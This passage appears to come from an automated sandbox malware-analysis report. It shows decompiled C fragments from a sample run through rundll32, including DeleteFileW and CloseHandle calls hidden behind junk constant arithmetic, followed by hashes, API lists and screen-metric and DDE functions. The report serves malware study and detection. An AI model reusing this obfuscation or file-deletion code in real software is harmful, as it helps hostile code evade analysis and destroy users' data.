				_v16 = _v16 ^ 0x3ba7e6ce;
				_v12 = 0x8319;
				_v12 = _v12 * 0x45;
				_v12 = _v12 + 0xffff39a4;
				_v12 = _v12 ^ 0x0022b84c;
				E00277378(__ecx, 0x497c0ce2, __ecx, 0x90f109b3, 0x28d);
				_t44 = DeleteFileW(_a8); // executed
				return _t44;
			}









                                                                      0x0027eb24
                                                                      0x0027eb27
                                                                      0x0027eb2b
                                                                      0x0027eb2c
                                                                      0x0027eb31
                                                                      0x0027eb49
                                                                      0x0027eb4c
                                                                      0x0027eb5b
                                                                      0x0027eb5e
                                                                      0x0027eb65
                                                                      0x0027eb6c
                                                                      0x0027eb73
                                                                      0x0027eb7a
                                                                      0x0027eb81
                                                                      0x0027eb88
                                                                      0x0027eb8f
                                                                      0x0027eb9a
                                                                      0x0027eb9d
                                                                      0x0027eba4
                                                                      0x0027ebb7
                                                                      0x0027ebc2
                                                                      0x0027ebc7

                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(3BA7E6CE), ref: 0027EBC2
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
                                                                      • Instruction ID: 678c83d54545e003ec635073dc1fc5522f3caa5391d1bceabe0c17498ecac5b7
                                                                      • Opcode Fuzzy Hash: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
                                                                      • Instruction Fuzzy Hash: 6111E3B1C0020DFBDF04DFE4DA4689EBBB4FB40314F60C599E814A62A1D7749B549F90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0027F1ED, Relevance: 1.3, APIs: 1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 85%
                                                                      			E0027F1ED(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t46;
				int _t57;
				signed int _t59;
				signed int _t60;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00282550(_t46);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x28beb0;
				_v16 = 0xe97b;
				_v16 = _v16 >> 3;
				_t59 = 0x47;
				_v16 = _v16 / _t59;
				_v16 = _v16 ^ 0x00001a39;
				_v12 = 0x2d01;
				_v12 = _v12 >> 8;
				_t60 = 0x3a;
				_v12 = _v12 / _t60;
				_v12 = _v12 ^ 0x000023d3;
				_v20 = 0xc5d9;
				_v20 = _v20 | 0x3e7a6da8;
				_v20 = _v20 ^ 0x3e7ad9f3;
				_v8 = 0x3ddd;
				_v8 = _v8 >> 7;
				_v8 = _v8 + 0xffffadd9;
				_v8 = _v8 ^ 0xffff8e91;
				E00277378(_t60, 0x171b6692, _t60, 0x90f109b3, 0x219);
				_t57 = CloseHandle(_a12); // executed
				return _t57;
			}













                                                                      0x0027f1f3
                                                                      0x0027f1f6
                                                                      0x0027f1f9
                                                                      0x0027f1fe
                                                                      0x0027f203
                                                                      0x0027f20a
                                                                      0x0027f213
                                                                      0x0027f21a
                                                                      0x0027f223
                                                                      0x0027f228
                                                                      0x0027f22d
                                                                      0x0027f234
                                                                      0x0027f23b
                                                                      0x0027f242
                                                                      0x0027f24a
                                                                      0x0027f24d
                                                                      0x0027f254
                                                                      0x0027f25b
                                                                      0x0027f262
                                                                      0x0027f269
                                                                      0x0027f270
                                                                      0x0027f274
                                                                      0x0027f27b
                                                                      0x0027f29a
                                                                      0x0027f2a5
                                                                      0x0027f2aa

                                                                      APIs
                                                                      • CloseHandle.KERNEL32(3E7AD9F3), ref: 0027F2A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
                                                                      • Instruction ID: 95afd98687017040017360548a82ee506a08824816f12396cbe56bbe756c9e9a
                                                                      • Opcode Fuzzy Hash: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
                                                                      • Instruction Fuzzy Hash: 141126B6D0020CEBDF05DFE5C84A9DEBBB5FB14308F10C589E914A6290D3B59B649F80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00298330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 00298361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0029839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 002983A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      • Opcode ID: 14801e8e4187dd84e8810d73be3efeebda3096c05967942d728a10351d33000d
                                                                      • Instruction ID: 23d148086a41ef341f7c2da157174d6bf047312b050737228224e8f244444ee8
                                                                      • Opcode Fuzzy Hash: 14801e8e4187dd84e8810d73be3efeebda3096c05967942d728a10351d33000d
                                                                      • Instruction Fuzzy Hash: DD11D671A127059FDB208F64EC487A7B7E8EF46B10F04456AFD46D7240EBB0A814CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002985AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 002985E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0029860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00298615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      • Opcode ID: b9ba22cf8d1204c11bb4486b9df3fb5b895004f23c92a6e3e9632575d10096e8
                                                                      • Instruction ID: 06b31614113e99452ba36a741628a32ab40d43a5cc892eb9a40e329b19810ceb
                                                                      • Opcode Fuzzy Hash: b9ba22cf8d1204c11bb4486b9df3fb5b895004f23c92a6e3e9632575d10096e8
                                                                      • Instruction Fuzzy Hash: 86311EB2D1520AAFDF11DFA4DD48AEF77BCAB46300F04452AE915D7200EB74D924CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00298404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00298471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0029847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      • Opcode ID: 9d7fd8fc1fd4058c24a8793b838413da3dc64c7d2897d7e72abe4dd4b4d216f8
                                                                      • Instruction ID: 302f7cc438eb186711d6e4e4311127d6ddb71355595a0699efb17a65898ef5cc
                                                                      • Opcode Fuzzy Hash: 9d7fd8fc1fd4058c24a8793b838413da3dc64c7d2897d7e72abe4dd4b4d216f8
                                                                      • Instruction Fuzzy Hash: F1110B31A127065FDB20CF60EC4CBA7B7E8EF06720F14452AED55DB240DB70A854CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002984D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00298545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00298550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      • Opcode ID: b4937ef57f76eafb2d7792793881913de3148afa7661eaa0459a60e2d2847c16
                                                                      • Instruction ID: fcd26279c018ab2010adaedcc935ee274d26c9324fea3bb38e52d3705e4d6e38
                                                                      • Opcode Fuzzy Hash: b4937ef57f76eafb2d7792793881913de3148afa7661eaa0459a60e2d2847c16
                                                                      • Instruction Fuzzy Hash: 9411E971A127059FDB20CF649C48BA7B7E8EB06310F4A452BED45D7280DB71AC18CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00298298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 002982E6
                                                                      • GetSystemMetrics.USER32(00000001), ref: 002982F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      • Opcode ID: e84ff3c128e566a8359e50380f972f8afe56fefe139e6e623acac5bbaf63c349
                                                                      • Instruction ID: 76c6f12beb48126d620898f51550b054db0a5fb77f8861befc34205108e170f4
                                                                      • Opcode Fuzzy Hash: e84ff3c128e566a8359e50380f972f8afe56fefe139e6e623acac5bbaf63c349
                                                                      • Instruction Fuzzy Hash: 6C01D131E13309AFDF004F50EC8CB9E7B95EB42B50F184166F904DB251CB70AC208BA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00298170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 002981C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 002981CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      • Opcode ID: 586cc2391e66c464692f6a8e36771aab1559c75d4928b2685166c3906c5fb0a4
                                                                      • Instruction ID: c79ff5f29a41ed1b45e162bcfb558560a53b86ee138987efe49db94c1e2961f6
                                                                      • Opcode Fuzzy Hash: 586cc2391e66c464692f6a8e36771aab1559c75d4928b2685166c3906c5fb0a4
                                                                      • Instruction Fuzzy Hash: 1A016D31A112169FDB109F14EC8DB57B799EB42391F188063ED08CB242DB75DC669BB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002D2B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 002D2B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 002D2BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 002D2BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 002D2BCD
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      • Opcode ID: f411bea0ccc91b44592bf7688a32a9423c99988bce1e53c1767ca8c9ce9565ea
                                                                      • Instruction ID: 7e1d1820e559a8da0485602dbb619508187b88d3dc89f02128748ec085a35e16
                                                                      • Opcode Fuzzy Hash: f411bea0ccc91b44592bf7688a32a9423c99988bce1e53c1767ca8c9ce9565ea
                                                                      • Instruction Fuzzy Hash: 6D21D6752142409FDB40EF68C8C5FAAB7E8AB49310F148196F998CF3A6D771EC54CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002D1428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DdeQueryConvInfo.USER32(?,?,00000060), ref: 002D14BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ConvInfoQuery
                                                                      • String ID: 0-$`
                                                                      • API String ID: 701148680-2222062258
                                                                      • Opcode ID: 3eb42e8e56cca436e2a6aa6ee2ff1a19228f6d4a58ba7c40e5a5cd0ec066b56b
                                                                      • Instruction ID: 90f9f89b0bcdb28c0e0fcd33b9feb544305d912da12e401a32785873ae399b45
                                                                      • Opcode Fuzzy Hash: 3eb42e8e56cca436e2a6aa6ee2ff1a19228f6d4a58ba7c40e5a5cd0ec066b56b
                                                                      • Instruction Fuzzy Hash: E3519576A2421AAFCB04EE5CE9855AE73B9EB48350F148022FD06D7B44CA34DD35CBE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002980E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 00298110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      • Opcode ID: da9ba636295a1a143ecec0194bc9e520779697ce4ac5183358b9f40c3daff6d5
                                                                      • Instruction ID: 64c9be3e7537bf8be6410fb936b0e703b823b186ea7d9c87e4e05b9bfb8e2b7d
                                                                      • Opcode Fuzzy Hash: da9ba636295a1a143ecec0194bc9e520779697ce4ac5183358b9f40c3daff6d5
                                                                      • Instruction Fuzzy Hash: 1FF090315362424EDF104F34AD8C722368AA743330F6C8A23E12E862D5DE798C669658
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%